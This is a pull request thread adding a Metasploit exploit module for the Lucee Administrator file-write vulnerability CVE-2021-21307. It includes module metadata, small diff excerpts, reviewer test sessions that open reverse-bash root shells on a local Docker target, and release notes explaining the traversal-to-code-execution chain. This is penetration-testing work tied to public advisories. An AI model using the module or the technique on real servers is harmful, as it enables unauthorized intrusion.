### PR TITLE
Add Lucee Administrator CVE-2021-21307 exploit

### PR DESCRIPTION
**Pull request by wvu**
```
msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) > info

       Name: Lucee Administrator imgProcess.cfm Arbitrary File Write
     Module: exploit/linux/http/lucee_admin_imgprocess_file_write
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-01-15

Provided by:
  rootxharsh
  iamnoooob
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8888             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /lucee           yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary file write in Lucee
  Administrator's imgProcess.cfm file to execute commands as the
  Tomcat user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-21307
  https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020-cve-2021-21307/7643
  https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
  https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md

msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) >
```

_Apple WAF bypass not included._

### CODE REVIEW

File: modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb [hunk 1]
```diff
@@ -0,0 +1,196 @@
...
+        ],
+        'References' => [
+          ['CVE', '2021-21307'],
+          ['URL', 'https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020-cve-2021-21307/7643'],
+          ['URL', 'https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r'],
+          ['URL', 'https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md']
+        ],
+        'DisclosureDate' => '2021-01-15', # rootxharsh and iamnoooob's writeup
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'], # TODO: Windows?
```
Comment (space-r7) [inline modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb:37]: Are you planning on adding a Windows target still?

**Review by space-r7 — COMMENTED** [review]
Code / docs look good to me! Just left a question regarding the Windows comment.

File: modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb [hunk 2]
```diff
@@ -0,0 +1,196 @@
...
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            # /opt/lucee/server/lucee-server/context/logs/application.log
+            # /opt/lucee/web/logs/exception.log
+            IOC_IN_LOGS,
+            # /opt/lucee/web/temp/admin-ext-thumbnails/__/
+            # /opt/lucee/web/temp/admin-ext-thumbnails/__/../../../context/[a-zA-Z0-9]{8,16}.cfm
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb:76]: 🥇

**Comment by space-r7** [comment]
Test against Docker setup:

```
msf6 > use exploit/linux/http/lucee_admin_imgprocess_file_write 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) > options

Module options (exploit/linux/http/lucee_admin_imgprocess_file_write):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with synta
                                         x 'file:<path>'
   RPORT      8888             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an a
                                         ddress on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /lucee           yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) > set lhost 192.168.140.33
lhost => 192.168.140.33
msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) > run

[*] Started reverse TCP handler on 192.168.140.33:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Lucee Administrator imgProcess.cfm detected.
[*] Writing CFML stub: http://127.0.0.1:8888/lucee/ARO2GGPU.cfm
[*] Executing cmd/unix/reverse_bash (Unix Command)
[+] Deleted /opt/lucee/web/temp/admin-ext-thumbnails/__/../../../context/ARO2GGPU.cfm
[+] Deleted /opt/lucee/web/temp/admin-ext-thumbnails/__/
[*] Command shell session 1 opened (192.168.140.33:4444 -> 192.168.140.33:61246) at 2021-08-16 14:25:39 -0500

whoami
root
uname -a
Linux 61b0f51aa010 5.10.25-linuxkit #1 SMP Tue Mar 23 09:27:39 UTC 2021 x86_64 GNU/Linux
```

File: modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb (hunk 2 above)
Comment (wvu-r7) [reply modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb:76]: Did I even get the regex right? Lmao.

File: modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb (hunk 1 above)
Comment (wvu-r7) [reply modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb:37]: It's unlikely to happen, at least in this PR. :(

File: modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb (hunk 2 above)
Comment (wvu-r7) [reply modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb:76]: It was originally a glob, but that didn't offer enough precision...

Comment (adfoster-r7) [reply modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb:76]: I like the extra detail; It's a shame the current data model doesn't offer extension points for additional metadata 😅

Comment (wvu-r7) [reply modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb:76]: https://github.com/rapid7/metasploit-framework/pull/10707#discussion_r220767224
#11785

RIP, lol.

**Comment by space-r7** [comment]
Also tested version `5.3.6.61`, will go ahead and land!

```
msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) > run

[*] Started reverse TCP handler on 192.168.140.33:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Lucee Administrator imgProcess.cfm detected.
[*] Writing CFML stub: http://127.0.0.1:8888/lucee/FLFnUuCDS52TVU.cfm
[*] Executing cmd/unix/reverse_bash (Unix Command)
[+] Deleted /opt/lucee/web/temp/admin-ext-thumbnails/__/../../../context/FLFnUuCDS52TVU.cfm
[+] Deleted /opt/lucee/web/temp/admin-ext-thumbnails/__/
[*] Command shell session 5 opened (192.168.140.33:4444 -> 192.168.140.33:62714) at 2021-08-16 16:55:32 -0500

whoami
root
uname -a
Linux e31331934598 5.10.25-linuxkit #1 SMP Tue Mar 23 09:27:39 UTC 2021 x86_64 GNU/Linux
```

**Comment by space-r7** [comment]
## Release Notes

An unauthenticated user is permitted to make requests through the `imgProcess.cfm` endpoint, and using the `file` parameter which contains a directory traversal vulnerability, they can write a file to an arbitrary location. Combining the two capabilities, this module writes a CFML script to the vulnerable server and achieves unauthenticated code execution as the user running the Lucee server.

**Comment by wvu-r7** [comment]
Thank you so much, @space-r7!

**Pull request merged**